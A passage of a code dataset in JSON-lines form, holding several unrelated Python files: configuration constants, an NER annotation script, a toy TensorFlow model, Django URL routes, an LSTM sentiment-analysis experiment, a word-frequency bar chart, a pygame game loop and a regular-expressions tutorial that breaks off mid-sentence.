2\nPLUGIN_AGENT_PLUGIN_TIME_LIMIT_MULTIPLE = 1.25\n\n# Secrets Manager Related Constants\nSECRETS_MANAGER_KEY_VALUE_NAMESPACE = KEY_VALUE_NAMESPACE_PREFIX + 'secrets'\n\n# Discovery Manager Related Constants\nDISCOVERY_PLUGIN_SCHEDULER_KEY_VALUE_NAMESPACE = KEY_VALUE_NAMESPACE_PREFIX + 'discovery_plugin_scheduler'\nDISCOVERY_PLUGIN_SCHEDULER_CELERY_APP_NAME = 'discovery_plugin_scheduler'\nDISCOVERY_PLUGIN_SCHEDULER_CELERY_TASK_PREFIX = 'discovery_plugin_scheduler'\nDISCOVERY_PLUGIN_SCHEDULER_LOCK_ACQUIRE_TIMEOUT = 5\n\n# Discovery Plugin Agent Related Constants\nDISCOVERY_PLUGIN_AGENT_KEY_VALUE_NAMESPACE = KEY_VALUE_NAMESPACE_PREFIX + 'discovery_plugin_agent_kv'\nDISCOVERY_PLUGIN_AGENT_MODULE_NAME = 'yahoo_panoptes.discovery.discovery_plugin_agent.discovery_plugin_task'\nDISCOVERY_PLUGIN_AGENT_CELERY_APP_NAME = 'discovery_plugin_agent'\nDISCOVERY_PLUGIN_AGENT_PLUGINS_CHILD_LOGGER_NAME = 'discovery_plugins'\nDISCOVERY_PLUGIN_AGENT_LOCK_PATH = '/panoptes/discovery/plugin_agent/plugins/lock'\nDISCOVERY_PLUGIN_AGENT_LOCK_ACQUIRE_TIMEOUT = 5\n\n# Resource Cache Related Constants\nRESOURCE_CACHE_DB_CURSOR_SIZE = 1000\nRESOURCE_CACHE_UPDATE_INTERVAL = 300\n\n# Resource Manager Related Constants\nRESOURCE_MANAGER_REDIS_GROUP = 'resources'\nRESOURCE_MANAGER_KEY_VALUE_NAMESPACE = KEY_VALUE_NAMESPACE_PREFIX + 'resource_manager_kv:resource'\nRESOURCE_MANAGER_CLIENT_ID_PREFIX = 'resource_manager'\nRESOURCE_MANAGER_KAFKA_GROUP_ID = 'resource_manager_group'\nRESOURCE_MANAGER_KAFKA_POLL_TIMEOUT = 15\nRESOURCE_MANAGER_RESOURCE_EXPIRE = 604800\nRESOURCE_MANAGER_MAX_PARTITION_FETCH_BYTES = 10485760\n\n# Polling Plugin Scheduler Related Constants\nPOLLING_PLUGIN_SCHEDULER_KEY_VALUE_NAMESPACE = KEY_VALUE_NAMESPACE_PREFIX + 'polling_plugin_scheduler_kv'\nPOLLING_PLUGIN_SCHEDULER_LOCK_ACQUIRE_TIMEOUT = 5\nPOLLING_PLUGIN_SCHEDULER_CELERY_APP_NAME = 'polling_plugin_scheduler'\nPOLLING_PLUGIN_SCHEDULER_CELERY_TASK_PREFIX = 'polling_plugin_task'\n\n# Enrichment 
Plugin Scheduler Related Constants\nENRICHMENT_PLUGIN_SCHEDULER_KEY_VALUE_NAMESPACE = KEY_VALUE_NAMESPACE_PREFIX + 'enrichment_plugin_scheduler_kv'\nENRICHMENT_PLUGIN_SCHEDULER_LOCK_ACQUIRE_TIMEOUT = 5\nENRICHMENT_PLUGIN_SCHEDULER_CELERY_APP_NAME = 'enrichment_plugin_scheduler'\nENRICHMENT_PLUGIN_SCHEDULER_CELERY_TASK_PREFIX = 'enrichment_plugin_task'\n\n# Polling Plugin Agent Related Constants\nPOLLING_PLUGIN_AGENT_KEY_VALUE_NAMESPACE = KEY_VALUE_NAMESPACE_PREFIX + 'polling_plugin_agent_kv'\nPOLLING_PLUGIN_AGENT_MODULE_NAME = 'yahoo_panoptes.polling.polling_plugin_agent.polling_plugin_task'\nPOLLING_PLUGIN_AGENT_CELERY_APP_NAME = 'polling_plugin_agent'\nPOLLING_PLUGIN_AGENT_PLUGINS_CHILD_LOGGER_NAME = 'polling_plugins'\n\n# Enrichment Plugin Agent Related Constants\nENRICHMENT_REDIS_GROUP = 'enrichments'\nENRICHMENT_PLUGIN_AGENT_KEY_VALUE_NAMESPACE = KEY_VALUE_NAMESPACE_PREFIX + 'enrichment_plugin_agent_kv'\nENRICHMENT_PLUGIN_AGENT_MODULE_NAME = 'yahoo_panoptes.enrichment.enrichment_plugin_agent.enrichment_plugin_task'\nENRICHMENT_PLUGIN_AGENT_CELERY_APP_NAME = 'enrichment_plugin_agent'\nENRICHMENT_PLUGIN_AGENT_PLUGINS_CHILD_LOGGER_NAME = 'enrichment_plugins'\n\n# Enrichment Plugins Results Related Constants\nENRICHMENT_PLUGIN_RESULTS_KEY_VALUE_NAMESPACE = PLUGINS_KEY_VALUE_NAMESPACE + KV_NAMESPACE_DELIMITER + 'enrichment'\n\n# Metrics processing constants\nMETRICS_CLIENT_ID_PREFIX = 'metrics_processing'\nMETRICS_KAFKA_GROUP_ID = 'metrics_processing_group'\nMETRICS_KAFKA_POLL_TIMEOUT = 5\nMETRICS_KEY_VALUE_NAMESPACE = KEY_VALUE_NAMESPACE_PREFIX + 'metrics_kv'\nMETRICS_CONFIDENCE_THRESHOLD = 0.33\nMETRICS_KV_STORE_TTL = 14400\nMETRICS_KV_STORE_TTL_MULTIPLE = 3\n\n# Metrics topics related constants\nMETRICS_RAW_TOPIC_SUFFIX = 'metrics'\nMETRICS_PROCESSED_TOPIC_SUFFIX = 'processed'\nMETRICS_TOPIC_NAME_DELIMITER = '-'\nMETRICS_TOPIC_KEY_DELIMITER = ':'\nMETRICS_REDIS_GROUP = 'metrics'\n","sub_path":"yahoo_panoptes/framework/const.py","file_name":"const.py","file_ext":"py","file_size_in_byte":5354,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"195983040","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nfrom russian_ner import TexterraAnnotator\n# from russian_ner import annotate_texterra_articles\nfrom article_utils import LoadArticles\nimport glob\nimport argparse\nimport os\nimport pickle\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument('--article_glob')\n parser.add_argument('--outpath')\n # indicate what api key you want to start on (no point\n # in trying keys that we know we've burned)\n parser.add_argument('--api_start_idx', type=int, default=0)\n args = parser.parse_args()\n\n country_tags = set()\n continent_tags = set()\n annotator = TexterraAnnotator(args.api_start_idx)\n for filename in sorted(glob.iglob(args.article_glob)):\n\n # if we've already done this file, move on\n outfile_name = os.path.join(args.outpath, os.path.basename(filename) + \".pickle\")\n if os.path.isfile(outfile_name):\n print (\"Already done\", outfile_name)\n continue\n\n articles, _ = LoadArticles(filename)\n tags = annotator.annotate(articles)\n# tags = annotate_texterra_articles(articles)\n\n # clear out the crazy amount of extra text that this API returns\n for tag in tags:\n if not \"annotations\" in tag:\n continue\n if not \"named-entity\" in tag[\"annotations\"]:\n continue\n for y in tag[\"annotations\"][\"named-entity\"]:\n del y[\"annotated-text\"]\n\n # cache these guys\n fp = open(outfile_name, \"wb\")\n pickle.dump(tags, fp)\n fp.close()\n\n # maybe want to get more tags eventually\n # for d in tags['annotations']['named-entity']:\n # if d['value']['tag'] == \"GPE_COUNTRY\":\n # country_tags.add(d['text'])\n\n # elif d['value']['tag'] == \"LOCATION_CONTINENT\":\n # continent_tags.add(d['text'])\n\n print (\"Done\")\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"src/russian_ner/cleanse_russian_countries.py","file_name":"cleanse_russian_countries.py","file_ext":"py","file_size_in_byte":1965,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"287403535","text":"import tensorflow as tf\n\ntestNum1 = [1,5,0,4,3,2,8,0,3,2]\ntestNum2 = [3,6,1,5,4,3,1,5,5,3]\nanswer = [4,11,1,9,7,5,9,5,8,5]\n\nx = tf.placeholder(tf.float32, [None,2])\ny_ = tf.placeholder(tf.float32, [None,1])\n\nW = tf.Variable([2,1])\nb = tf.Variable([3])\ny = tf.nn.softmax(tf.matmul(x,W)+b)\n\ncross_entropy = -tf.reduce_sum(y_*tf.log(y))\noptimizer = tf.train.GradientDescentOptimizer(0.01)\ntrain = optimizer.minimize(cross_entropy)\n\npredict = tf.equal(tf.arg_max(y,1),tf.arg_max(y_,1))\naccuracy = tf.reduce_mean(tf.cast(predict, tf.float32))\n\nsess = tf.Session()\nsess.run(tf.global_variables_initializer())\n\nfor step in range(3500):\n rows = [testNum1,testNum2]\n y_ans = answer\n fd = {x:rows,y_:y_ans}\n sess.run(train, feed_dict=fd)\n if step % 50 == 0:\n cre = sess.run(cross_entropy, feed_dict=fd)\n acc = sess.run(accuracy,feed_dict={x:rows})\n print(\"step=\",step,\"acc=\",acc,\"cre=\",cre)\n","sub_path":"Machine_learning/Test/Tensorflow_Bmi.py","file_name":"Tensorflow_Bmi.py","file_ext":"py","file_size_in_byte":917,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"391839710","text":"from django.conf.urls import url\nfrom django.views.generic.base import RedirectView\n\nfrom . import views\n\nurlpatterns = [\n\n url(r'^simple/$',\n views.ImporterSimpleIndexView.as_view(),\n name='importer-simple-index'),\n url(r'^simple/institutions/$',\n views.ImportInstitutionsWizardView.as_view(),\n name='importer-simple-institutions'),\n url(r'^simple/teams/$',\n views.ImportTeamsWizardView.as_view(),\n name='importer-simple-teams'),\n url(r'^simple/adjudicators/$',\n views.ImportAdjudicatorsWizardView.as_view(),\n name='importer-simple-adjudicators'),\n url(r'^simple/venues/$',\n views.ImportVenuesWizardView.as_view(),\n name='importer-simple-venues'),\n\n # Private URLs\n url(r'^private-urls/$',\n views.RandomisedUrlsView.as_view(),\n name='randomised-urls-view'),\n url(r'^private-urls/generate/$',\n views.GenerateRandomisedUrlsView.as_view(),\n name='randomised-urls-generate'),\n\n url(r'^private-urls/email/ballot/$',\n views.EmailBallotUrlsView.as_view(),\n name='email-ballot-urls'),\n url(r'^private-urls/emails/ballot/confirm/$',\n views.ConfirmEmailBallotUrlsView.as_view(),\n name='confirm-ballot-urls-send'),\n\n url(r'^private-urls/email/feedback/$',\n views.EmailFeedbackUrlsView.as_view(),\n name='email-feedback-urls'),\n url(r'^private-urls/emails/confirm/$',\n views.ConfirmEmailFeedbackUrlsView.as_view(),\n name='confirm-feedback-urls-send'),\n\n # Old URLs for randomised URLs, now permanent redirects\n url(r'^randomised_urls/$',\n RedirectView.as_view(permanent=True, pattern_name='randomised-urls-view')),\n url(r'^randomised_urls/generate/$',\n RedirectView.as_view(permanent=True, pattern_name='randomised-urls-generate')),\n url(r'^randomised_urls/email/ballot/$',\n RedirectView.as_view(permanent=True, pattern_name='email-ballot-urls')),\n url(r'^randomised_urls/emails/ballot/confirm/$',\n RedirectView.as_view(permanent=True, pattern_name='confirm-ballot-urls-send')),\n url(r'^randomised_urls/email/feedback/$',\n RedirectView.as_view(permanent=True, pattern_name='email-feedback-urls')),\n url(r'^randomised_urls/emails/confirm/$',\n RedirectView.as_view(permanent=True, pattern_name='confirm-feedback-urls-send')),\n\n]\n","sub_path":"tabbycat/importer/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2368,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"196682488","text":"# Created by Hansi at 12/22/2021\nimport logging\nimport os\n\nimport pandas as pd\nfrom sklearn.utils import shuffle\n\nfrom algo.models.nn.nn_model import NNModel\nfrom algo.util.evaluate import get_eval_results\nfrom algo.util.label_encoder import reversed_label_mapping, encode, decode\nfrom algo.util.data_processor import preprocess_data, split_data\nfrom algo.util.file_util import delete_create_folder, create_folder_if_not_exist\nfrom experiments import lstm_config\nfrom experiments.lstm_config import SEED, BASE_PATH, PREDICTION_DIRECTORY\n\nlogging.basicConfig(level=logging.INFO)\nlogger = logging.getLogger(__name__)\n\n\ndef train(train_file_paths, test_file_paths=None, predictions_folder=None):\n \"\"\"\n Train LSTM model\n :param train_file_paths: list\n train file format - .tsv with columns [id, tweet, label]\n :param test_file_paths: list, optional\n Given test file paths, the trained model will be evaluated on them and the results will be logged.\n :param predictions_folder: str, optional\n Given a predictions folder, test predictions will be saved\n :return:\n \"\"\"\n delete_create_folder(lstm_config.OUTPUT_DIRECTORY)\n new_data_dir = os.path.join(lstm_config.OUTPUT_DIRECTORY, f\"data\")\n delete_create_folder(new_data_dir)\n\n # merge training data\n data = pd.DataFrame(columns=['id', 'tweet', 'label'])\n for path in train_file_paths:\n temp_data = pd.read_csv(path, sep=\"\\t\", encoding=\"utf-8\")\n data = data.append(temp_data, ignore_index=True)\n if len(train_file_paths) > 1:\n data = shuffle(data, random_state=SEED)\n\n # format data\n data = data[['tweet', 'label']]\n data = data.rename({'tweet': 'text'}, axis=1)\n data = data.rename({'label': 'labels'}, axis=1)\n\n # split training data\n train, dev = split_data(data, SEED, label_column='labels', test_size=lstm_config.config['dev_size'])\n\n # encode labels\n train = encode(train, label_column='labels')\n dev = encode(dev, label_column='labels')\n\n # preprocess data\n train['text'] = train['text'].apply(lambda x: preprocess_data(x, preserve_case=False, emoji_to_text=lstm_config.config['emoji_to_text']))\n dev['text'] = dev['text'].apply(lambda x: preprocess_data(x, preserve_case=False, emoji_to_text=lstm_config.config['emoji_to_text']))\n\n train.to_csv(os.path.join(new_data_dir, lstm_config.config['train_file']), sep=\"\\t\", index=False)\n logger.info(f\"Saved {train.shape[0]} train instances.\")\n dev.to_csv(os.path.join(new_data_dir, lstm_config.config['dev_file']), sep=\"\\t\", index=False)\n logger.info(f\"Saved {dev.shape[0]} dev instances.\")\n\n # train model\n logger.info(f\"Training model...\")\n model = NNModel('lstm', data_dir=new_data_dir, args=lstm_config.config)\n model.train()\n\n # evaluate model\n if test_file_paths is not None:\n logger.info(f\"Evaluating model...\")\n for test_path in test_file_paths:\n logger.info(f'Predicting {test_path}...')\n test_data = pd.read_csv(test_path, sep=\"\\t\", encoding=\"utf-8\")\n logger.info(f\"Test data: {test_data.shape}\")\n\n # format and preprocess data\n test_data = test_data.rename({'tweet': 'text'}, axis=1)\n test_data['text'] = test_data['text'].apply(lambda x: preprocess_data(x, preserve_case=False, emoji_to_text=lstm_config.config['emoji_to_text']))\n\n # get model predictions\n preds, raw_preds = model.predict(test_data['text'].tolist())\n # decode predicted labels\n preds = decode(preds)\n\n # evaluate results\n eval_results = get_eval_results(test_data['label'].tolist(), preds)\n logger.info(f'{test_path} results: 
{eval_results}')\n\n if predictions_folder is not None:\n create_folder_if_not_exist(predictions_folder, is_file_path=False)\n # save predictions\n file_name = os.path.splitext(os.path.basename(test_path))[0]\n test_data['predictions'] = preds\n for i in reversed_label_mapping.keys():\n test_data[reversed_label_mapping[i]] = raw_preds[:, i]\n test_data['id'] = test_data['id'].apply(\n lambda x: str(x)) # save id as a str to avoid round off by excel\n test_data.to_excel(os.path.join(predictions_folder, f'{file_name}.xlsx'), sheet_name='Sheet1',\n index=False)\n\n\ndef predict(data_file_path, predictions_folder, evaluate=True):\n \"\"\"\n Predict using a model, and save final sentiment and confidence values to .xlsx file\n :param data_file_path: str\n format - .tsv file with column 'tweet'\n :param predictions_folder: str\n :param evaluate: boolean, optional\n If true the predictions will be evaluated and there should be a 'label' column in input data to use with\n evaluation.\n :return:\n \"\"\"\n create_folder_if_not_exist(PREDICTION_DIRECTORY, is_file_path=False)\n file_name = os.path.splitext(os.path.basename(data_file_path))[0]\n\n data = pd.read_csv(data_file_path, sep=\"\\t\", encoding=\"utf-8\")\n data = data.rename({'tweet': 'text'}, axis=1)\n data['text'] = data['text'].apply(lambda x: preprocess_data(x, preserve_case=False, emoji_to_text=lstm_config.config['emoji_to_text']))\n\n model = NNModel(lstm_config.config['best_model_dir'])\n preds, raw_preds = model.predict(data['text'].tolist())\n # decode predicted labels\n preds = decode(preds)\n\n if evaluate:\n eval_results = get_eval_results(data['label'].tolist(), preds)\n logger.info(eval_results)\n\n data['predictions'] = preds\n for i in reversed_label_mapping.keys():\n data[reversed_label_mapping[i]] = raw_preds[:, i]\n data['id'] = data['id'].apply(lambda x: str(x)) # save id as a str to avoid round off by excel\n data.to_excel(os.path.join(predictions_folder, f'{file_name}.xlsx'), sheet_name='Sheet1', index=False)\n\n\nif __name__ == '__main__':\n fifa_train_file = os.path.join(BASE_PATH, 'data/fifa_2014/train.tsv')\n fifa_test_file = os.path.join(BASE_PATH, 'data/fifa_2014/test.tsv')\n semeval_train_file = os.path.join(BASE_PATH, 'data/semeval_data/train.tsv')\n semeval_test_file = os.path.join(BASE_PATH, 'data/semeval_data/test.tsv')\n munliv_train_file = os.path.join(BASE_PATH, 'data/munliv/munliv_train.tsv')\n munliv_test_file = os.path.join(BASE_PATH, 'data/munliv/munliv_test.tsv')\n brexitvote_train_file = os.path.join(BASE_PATH, 'data/brexitvote/brexitvote_train.tsv')\n brexitvote_test_file = os.path.join(BASE_PATH, 'data/brexitvote/brexitvote_test.tsv')\n predictions_folder = lstm_config.PREDICTION_DIRECTORY\n\n train_file_paths = [fifa_train_file]\n test_file_paths = [fifa_test_file, munliv_test_file, semeval_test_file, brexitvote_test_file]\n # train(train_file_paths, test_file_paths=test_file_paths, predictions_folder=predictions_folder)\n\n munlive_file = os.path.join(BASE_PATH, 'data/munliv/munliv-15.28-17.23.tsv')\n predict(munlive_file, predictions_folder, evaluate=False)\n munlive_file_no_dups = os.path.join(BASE_PATH, 'data/munliv/munliv-15.28-17.23-no_duplicates.tsv')\n predict(munlive_file_no_dups, predictions_folder, evaluate=False)\n\n brexitvote_file = os.path.join(BASE_PATH, 'data/brexitvote/brexitvote-08.00-13.59.tsv')\n predict(brexitvote_file, predictions_folder, evaluate=False)\n brexitvote_file_no_dups = os.path.join(BASE_PATH, 'data/brexitvote/brexitvote-08.00-13.59-no_duplicates.tsv')\n 
predict(brexitvote_file_no_dups, predictions_folder, evaluate=False)","sub_path":"experiments/lstm_experiment.py","file_name":"lstm_experiment.py","file_ext":"py","file_size_in_byte":7592,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
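The training script above round-trips labels through encode/decode and indexes raw prediction columns with reversed_label_mapping. A minimal sketch of that contract, under the assumption of a hypothetical three-class label set (the real mapping lives in algo.util.label_encoder, which is not shown here):

import pandas as pd

label_mapping = {"negative": 0, "neutral": 1, "positive": 2}  # hypothetical classes
reversed_label_mapping = {v: k for k, v in label_mapping.items()}

def encode(df, label_column="labels"):
    # map string labels to the integer ids the network trains on
    df = df.copy()
    df[label_column] = df[label_column].map(label_mapping)
    return df

def decode(preds):
    # map integer predictions back to string labels
    return [reversed_label_mapping[int(p)] for p in preds]

data = pd.DataFrame({"text": ["great match", "awful call"], "labels": ["positive", "negative"]})
print(encode(data)["labels"].tolist())  # [2, 0]
print(decode([2, 0]))                   # ['positive', 'negative']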
+{"seq_id":"349317859","text":"r\"\"\"knock36.py\n36. 頻度上位10語\n出現頻度が高い10語とその出現頻度をグラフ(例えば棒グラフなど)で表示せよ.\n\n[URL]\nhttps://nlp100.github.io/ja/ch04.html#36-頻度上位10語\n\n[Usage]\npython knock36.py\n\"\"\"\nimport matplotlib.pyplot as plt\n\nfrom knock35 import build_cnter\n\nif __name__ == \"__main__\":\n query = {\"surface\": \"表層形\"}\n num = 10\n\n cnter = build_cnter(query)\n labels, data = zip(*cnter.most_common(num))\n\n plt.bar(range(num), data)\n plt.title(f\"頻度上位 {num} 語\")\n plt.xticks(range(num), map(lambda x: f'\"{x}\"', labels))\n plt.xlabel(f\"単語({query})\")\n plt.ylabel(\"出現頻度\")\n plt.savefig(\"out36.png\")\n","sub_path":"kiyuna/chapter04/knock36.py","file_name":"knock36.py","file_ext":"py","file_size_in_byte":699,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"335943145","text":"import pygame\r\nfrom player import Player\r\nfrom board import Board\r\nfrom anime import Anime\r\nfrom tverdolobiy import Tverdolobiy\r\nfrom merzopakostniy import Merzopakostniy\r\nfrom legushka import Legushka\r\nfrom button import Button\r\nfrom chek import Check\r\nfrom finish import Finish\r\nfrom game import screen, terminate, FPS, FON, draw, name\r\n\r\nup, down, left, right = ([119, 275], [115, 273], [97, 274], [100, 276])\r\nclock = pygame.time.Clock()\r\n\r\n\r\ndef game():\r\n group = pygame.sprite.Group()\r\n player_anim = Anime(group, (228, 288))\r\n board = Board.load_map(None, name)\r\n board.set_view(30, 30, 30)\r\n lst = []\r\n if sum(board.hero[0]):\r\n player = Player(screen, player_anim, board, board.hero[0])\r\n player_anim.resize(30)\r\n if sum(board.hero[1]):\r\n tverdolobiy = Tverdolobiy(group, board.hero[1], board, player)\r\n tverdolobiy.resize(30)\r\n lst.append(tverdolobiy)\r\n if sum(board.hero[2]):\r\n merzopakostniy = Merzopakostniy(group, board.hero[2], board, player)\r\n merzopakostniy.resize(30)\r\n if sum(board.hero[3]):\r\n legushka = Legushka(group, board.hero[3], board, player)\r\n legushka.resize(30)\r\n lst.append(legushka)\r\n running = True\r\n c = 0\r\n while running:\r\n c += 1\r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT:\r\n running = False\r\n if event.type == pygame.MOUSEBUTTONDOWN:\r\n board.get_click(event.pos)\r\n if event.type == pygame.KEYDOWN:\r\n if event.key in up:\r\n player.set_dir('up')\r\n if event.key in down:\r\n player.set_dir('down')\r\n if event.key in left:\r\n player.set_dir('left')\r\n if event.key in right:\r\n player.set_dir('right')\r\n if event.key == pygame.K_LEFT:\r\n player.set_dir('left')\r\n if event.key == pygame.K_RIGHT:\r\n player.set_dir('right')\r\n if event.key == pygame.K_UP:\r\n player.set_dir('up')\r\n if event.key == pygame.K_DOWN:\r\n player.set_dir('down')\r\n screen.fill((0, 0, 0))\r\n board.render()\r\n if not len(board.check_points):\r\n board.check_points.add(None)\r\n if not board.are_left():\r\n board.reset()\r\n player.move([])\r\n player_anim.rect.x, player_anim.rect.y = player.x, player.y\r\n if sum(board.hero[2]):\r\n merzopakostniy.move()\r\n if not c % 2:\r\n if sum(board.hero[3]):\r\n legushka.move()\r\n if sum(board.hero[1]):\r\n tverdolobiy.move()\r\n group.draw(screen)\r\n if c % 20 == 0:\r\n player_anim.update()\r\n if sum(board.hero[2]):\r\n check = Check(player, merzopakostniy.num_bomb() + lst)\r\n elif sum(board.hero[0]):\r\n check = Check(player, lst)\r\n if check.checkaed():\r\n running = False\r\n draw(str(len(board.check_points) - 1 + board.count))\r\n pygame.display.flip()\r\n Finish(group, str(len(board.check_points) - 1 + board.count))\r\n\r\n\r\ndef load_screen():\r\n if True:\r\n p = (-1, -1)\r\n f = False\r\n group = pygame.sprite.Group()\r\n b = Button()\r\n screen.blit(FON, (0, 0))\r\n while True:\r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT:\r\n terminate()\r\n elif event.type == pygame.MOUSEMOTION:\r\n p = event.pos\r\n group.update(event.pos, False)\r\n b.update(event.pos)\r\n elif event.type == pygame.MOUSEBUTTONDOWN:\r\n if b.update(event.pos, True):\r\n game()\r\n return\r\n group.update(p, f)\r\n group.draw(screen)\r\n pygame.display.flip()\r\n clock.tick(FPS)\r\n\r\n\r\nwhile True:\r\n load_screen()\r\n","sub_path":"game/Play.py","file_name":"Play.py","file_ext":"py","file_size_in_byte":4086,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"183412126","text":"\n#! python3\n\n###############################\n#Regular Expressions\n###############################\n\n#these are similar to Ctrl+F commands in a browser, but can look for patterns\n#not just specific strings\n\n#non regular expression example\n#look at how much we have to add if we want to check to see if something is a valid phone number\n\ndef isPhoneNumber(text):\n if len(text) != 12:\n return False\n for i in range (0,3):\n if not text[i].isdecimal():\n return False\n if text[3] != '-':\n return False\n for i in range (4,7):\n if not text[i].isdecimal():\n return False\n if text[7] != '-':\n return False\n for i in range (8,12):\n if not text[i].isdecimal():\n return False\n return True\n\nstring = '415-555-1234'\nprint(isPhoneNumber(string))\nstring = '415-bana-1234'\nprint(isPhoneNumber(string))\n\n\nmessage = 'Call me at 415-555-1234'\nfoundNumber = False\nfor i in range(len(message)):\n chunk = message[i:i+12]\n if isPhoneNumber(chunk):\n print('Phone Number found!')\n foundNumber = True\n\nif foundNumber == False:\n print('no number found')\n\n\n#now lets do this with regular expressions\n#Steps:\n#Import re module\n#create the string value you wish to search\n#create the regex compile object\n#use the search or findall functions to return values!\n\nimport re\n\nmessage = 'Call me at 415-555-1234, or 555-555-5555'\n\nphoneNumRegex = re.compile(r'\\d\\d\\d-\\d\\d\\d-\\d\\d\\d\\d')\nmatch = phoneNumRegex.search(message)\nprint(match.group())\n\n#NOTE: you usually pass raw strings to re.compile()\n\n#this returns the first instance of this patter\n#we can also use find all instead!\nmatch = phoneNumRegex.findall(message)\nprint(match)\n\n###############################\n#GROUPS\n###############################\n#what if we wanted to get only the area code?\n#we can use parantheses to divide the returned match into groups\n#those groups can then be returned individually using match.group(#)\n\nmessage = 'Call me at 415-555-1234, or 555-555-5555'\n\nphoneNumRegex = re.compile(r'(\\d\\d\\d)-(\\d\\d\\d-\\d\\d\\d\\d)')\nmatch = phoneNumRegex.search(message)\nprint(match.group(1))\nprint(match.group(2))\n\n#by using an escape character we can actually treat a parantheses as a character in\n#our target string pattern\n\n###############################\n#Pipe Characters\n###############################\nmessage = 'I am the Batman and I drive a Batcopter, also Batbat'\n\nbatNumRegex = re.compile(r'Bat(man|copter|bat)')\n\n#returns first instance of compound word: Batman\nmatch = batNumRegex.search(message)\nprint(match.group())\n\n#this only returns the suffixes: \nmatch = batNumRegex.findall(message)\nprint(match)\n\n###############################\n#Optional Portions '?' and '*' syntax\n###############################\n\n#I want to search for a pattern that may or may not include something in the middle\n\nmessage = 'I am the Batman and I drive a Batcopter, also Batwoman is cool, Batwowoman'\nbatNumRegex = re.compile(r'Bat(man|woman)')\nmatch = batNumRegex.findall(message)\nprint(match)\n\n#I can also do :\nbatNumRegex = re.compile(r'Bat(wo)?man')\nmatch = batNumRegex.search(message)\nprint(match.group())\n\n# the (wo)? 
means this middle string can occur or not occur bt will still be included\n\n#can we apply this to the phone number one to make area code optional?\n\nmessage = 'Call me at 415-555-1234, or 555-555-5555'\n\nphoneNumRegex = re.compile(r'(\\d\\d\\d-)?\\d\\d\\d-\\d\\d\\d\\d')\nmatch = phoneNumRegex.search(message)\nprint(match.group())\nmatch = phoneNumRegex.findall(message)\nprint(match)\n\n#using the * character instead of ?, we can search for any number of repetitions\n\nmessage = 'I am the Batman and I drive a Batcopter, also Batwoman is cool, Batwowoman'\nbatNumRegex = re.compile(r'Bat(wo)*man')\nmatch = batNumRegex.findall(message)\nprint(match)\n\n\n###############################\n#Required Portions '+' syntax\n###############################\n\n#The + character instead of * or ? means that the portion must appear at least once\n\nmessage = 'I am the Batman and I drive a Batcopter, also Batwoman is cool, Batwowoman'\nbatNumRegex = re.compile(r'Bat(wo)+man')\nmatch = batNumRegex.findall(message)\nprint(match)\n\n###############################\n#Required Portions with exact # of repetitions '{}' syntax\n###############################\n\n#Having a {#} after a (pattern) says only find instances where it occurrs # of times exactly\n\nmessage = 'Ha HaHa HaHaHa HaHaHaHa'\nHaRegex = re.compile(r'(Ha){3}')\nmatch = HaRegex.findall(message)\nprint(match)\n\n\n#you can also add another param to {} to set a max value\n\nmessage = 'Ha HaHa HaHaHa HaHaHaHa'\nHaRegex = re.compile(r'(Ha){3,5}')\nmatch = HaRegex.findall(message)\nprint(match)\n\n#you can add a ? at the end of the {} to do a NON greedy match\n\n#this one finds the will go to the max length on the first valid instance of 3 to 5 numbers\n#GREEDY\nmessage = '123456789'\nnumRegex = re.compile(r'(\\d){3,5}')\nmatch = numRegex.search(message)\nprint(match.group())\n\n#This one will return the first valid options, which would be 3 numbers\n#NON-GREEDY\nnumRegex = re.compile(r'(\\d){3,5}?')\nmatch = numRegex.search(message)\nprint(match.group())\n\n\n\n###############################\n# .findall()\n###############################\n\n\nmessage = 'Call me at 415-555-1234, or 555-555-5555'\n\nphoneNumRegex = re.compile(r'((\\d\\d\\d)-(\\d\\d\\d-\\d\\d\\d\\d))')\n#only returns first instance\nmatch = phoneNumRegex.search(message)\nprint(match.group())\n\n#returns all instances but returned data types are a little different than normal\n#groups can change how they items are returned\n#see example below\nmatch = phoneNumRegex.findall(message)\nprint(match)\n# [('415-555-1234', '415', '555-1234'), ('555-555-5555', '555', '555-5555')]\n\n\n###############################\n# Character Classes\n###############################\n\n#number\n# \\d\n#anything BUT a number\n# \\D\n#any letter, number, underscore\n# \\w\n#anything BUT letter, number, underscore\n# \\W\n#any space, tab, newline\n#\\s\n#anything BUT space, tab, newline\n#\\S\n\n\nlyrics = '12 drummers drumming, 11 pipers piping, 10 lords a leaping'\n\nxmasRegex = re.compile(r'\\d+\\s\\w+')\nmatch = xmasRegex.findall(lyrics)\nprint(match)\n# ['12 drummers', '11 pipers', '10 lords']\n\n#create your own character class using []\n\n#all lower case letters a to z\nletterRegex = re.compile(r'[a-z]')\n\n#all vowels\nvowelRegex = re.compile(r'[aeiouAEIOU]')\nprint(vowelRegex.findall('RoboCop eats baby food!'))\n\n#all vowels that occur twice in a row\nvowelRegex = re.compile(r'[aeiouAEIOU]{2}')\nprint(vowelRegex.findall('RoboCop eats baby food!'))\n\n#we can also do the anything BUT our choices using 
